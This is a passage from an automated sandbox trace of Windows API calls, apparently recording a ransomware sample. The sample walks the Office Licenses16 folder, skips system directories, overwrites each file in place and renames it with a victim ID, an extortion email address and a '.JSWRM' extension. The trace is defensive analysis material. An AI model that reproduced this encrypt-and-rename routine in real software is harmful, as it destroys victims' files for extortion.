lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0107.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0107.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0107.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0107.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0107.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.657] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0107.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0107.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0107.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.658] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8c7483f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8c7483f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8d7f8b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b9f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_Trial-pl.xrm-ms", cAlternateFileName="PRD323~1.XRM")) returned 1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.659] lstrcmpiW (lpString1="ProfessionalR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0107.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0107.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0107.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0107.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0107.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0107.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0107.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0107.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0107.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0107.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0107.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0107.659] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.660] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11167) returned 1 [0107.660] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24c1d0 [0107.660] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b90, lpOverlapped=0x0) returned 1 [0107.662] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.662] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b90, lpOverlapped=0x0) returned 1 [0107.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.662] CloseHandle (hObject=0x45c) returned 1 [0107.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0107.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0107.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0107.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0107.663] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0107.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0107.663] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.663] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0107.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0107.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0107.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0107.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0107.664] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8c28391, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8c28391, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8d0d1ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5ad5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_Trial-ppd.xrm-ms", cAlternateFileName="PR10BB~1.XRM")) returned 1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.664] lstrcmpiW (lpString1="ProfessionalR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0107.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0107.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0107.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0107.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0107.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0107.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0107.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.665] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23253) returned 1 [0107.665] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ad0) returned 0x24c1d0 [0107.665] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ad0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ad0, lpOverlapped=0x0) returned 1 [0107.668] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.668] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ad0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ad0, lpOverlapped=0x0) returned 1 [0107.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.668] CloseHandle (hObject=0x45c) returned 1 [0107.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0107.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0107.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0107.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0107.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.669] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0107.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0107.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0107.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0107.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0107.670] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8c28391, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8c28391, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8dcbd7a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_Trial-ul-oob.xrm-ms", cAlternateFileName="PR6261~1.XRM")) returned 1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.670] lstrcmpiW (lpString1="ProfessionalR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0107.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0107.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0107.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Trial-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0107.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.670] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0107.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0107.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.671] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11621) returned 1 [0107.671] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0107.671] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0107.673] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.673] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0107.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.673] CloseHandle (hObject=0x45c) returned 1 [0107.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0107.674] 